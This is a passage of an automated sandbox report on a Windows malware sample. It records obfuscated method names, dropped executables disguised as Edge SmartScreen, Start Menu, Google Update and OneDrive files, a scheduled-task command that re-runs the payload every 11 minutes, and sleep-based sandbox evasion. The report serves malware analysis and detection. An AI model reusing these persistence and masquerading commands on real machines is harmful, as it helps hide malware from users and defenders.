Source: 0JLWNg4Sz1.exe, jhG8A4QhyucfjXMipUP.cs High entropy of concatenated method names: 'P9X', 'XimbQYKJlSi', 'imethod_0', 'bdhQjhC2QU', 'yOGXRcb7vThrTt5NgHae', 'aPueChb7zU4SxSSFTCHs', 'Ameqfsbq68Pc4WSavAE5', 'b6kNHrbqb9W3po1BGRgK', 'pcC78xbqmrGWcjR8Bk1S'
Source: 0JLWNg4Sz1.exe, xl4l8n4bGNxEn79Hq5X.cs High entropy of concatenated method names: 'iGQ4PVxUDq', 'ccY4AmvxZX', 'qbo4IdENRX', 'pVixutbcRHYi5MJ3ZLVi', 'phZP45bc4dWjZyRdmI9C', 'zwIpxHbcQRwBc2UDg2rO', 'VT66QFbceVHRelrVG3wy', 'IXZVmGbc31io9O9BGrRd', 'xh8CDSbcYEuXt4VmKuyF', 'DNGlQcbcs8WGfXZBrZbF'
Source: 0JLWNg4Sz1.exe, LoGmZY4pgRVQxt1yNTZ.cs High entropy of concatenated method names: 'eoG4cxKTI8', 'iAh47j9tn7', 'i64Qinbc20xdggfYDg5f', 'D0YVL0bcXy14x2ThpQQE', 'alI5a9bc0Q2J3krx67Ft', 'PI0no1bcyodUYBE4oyvr', 'jD8N1YbcEr5WJ6Fn7kOn', 'WCjDjZbcG22taZlH3xFs', 'hHWru1bcTCCDmk07DeXQ', 'dnHgXybcKHClnG50tJQT'
Source: 0JLWNg4Sz1.exe, twGaCcfxExm4QVpv4X3.cs High entropy of concatenated method names: 'b76', 'method_0', 'q7Q', 'K41', 'vEh', 'pu6', 'Xk4', 'K81', 'YV4', 'method_1'
Source: 0JLWNg4Sz1.exe, dZF6KOVnHUCFSiJA1fN.cs High entropy of concatenated method names: 'ydgVVaxVj4', 'ROWVghusDZ', 'ALxVwODZo8', 'NdWVBqpcd1', 'E9AVDcBJt7', 'Jtn2vHbH2dNen3LM9NBi', 'sSMYYxbHXym88ZTAkeDI', 'OXBHpibH0vQGT9BG9RYy', 'ufOf5UbHyAPdQpEg6R0h', 'K17pv5bHExfvUIPGpYFr'
Source: 0JLWNg4Sz1.exe, cTsTGcaWXYIhqk3nyC4.cs High entropy of concatenated method names: 'kmNaDpUZgA', 'pcwauxICB6', 'iEwap69FTG', 'd6SadT1YZH', 'lPDacEiR8U', 'BPqa7SXSd1', 'gYxaqVomLk', 'R3TafdLpFR', 'Q84aMST7LK', 'UfLar02Hdm'

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Recovery\StartMenuExperienceHost.exe Jump to dropped file
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe File created: C:\Users\user\Desktop\KjTCumlu.log Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Users\user\Desktop\ALzNWdSZ.log Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Recovery\DViaOgnvmAhwCXZ.exe Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Users\user\Desktop\ALzNWdSZ.log Jump to dropped file
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe File created: C:\Users\user\Desktop\KjTCumlu.log Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: 1860000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: 1B460000 memory reserve | memory write watch
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Memory allocated: B00000 memory reserve | memory write watch
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Memory allocated: 1A6C0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Memory allocated: 1900000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Memory allocated: 1B2F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: 840000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: 1A400000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: 16B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: 1B320000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Memory allocated: 17E0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Memory allocated: 1B2A0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Memory allocated: 1380000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Memory allocated: 1AE90000 memory reserve | memory write watch
Source: C:\Recovery\StartMenuExperienceHost.exe Memory allocated: 1440000 memory reserve | memory write watch
Source: C:\Recovery\StartMenuExperienceHost.exe Memory allocated: 1AFE0000 memory reserve | memory write watch
Source: C:\Recovery\StartMenuExperienceHost.exe Memory allocated: 1170000 memory reserve | memory write watch
Source: C:\Recovery\StartMenuExperienceHost.exe Memory allocated: 1AE10000 memory reserve | memory write watch
Source: C:\Recovery\StartMenuExperienceHost.exe Memory allocated: 1230000 memory reserve | memory write watch
Source: C:\Recovery\StartMenuExperienceHost.exe Memory allocated: 1AC70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 600000
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599873
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599765
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599656
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599546
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599437
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599328
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599218
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599109
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598999
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598890
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 3600000
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598781
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598671
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598562
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598453
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598343
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598234
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598125
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598014
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597906
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597796
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597686
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597578
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597468
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597358
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597250
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597140
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597031
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596921
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596812
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596586
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596484
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596374
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596256
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596125
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596012
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595905
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595796
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595684
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595578
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595468
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595359
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595250
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595140
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595031
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594921
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594812
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594703
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594583
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Window / User API: threadDelayed 1994 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Window / User API: threadDelayed 7798 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KjTCumlu.log Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ALzNWdSZ.log Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe TID: 7580 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 7764 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -30437127721620741s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599873s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599546s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599437s >= -30000s Jump to behavior
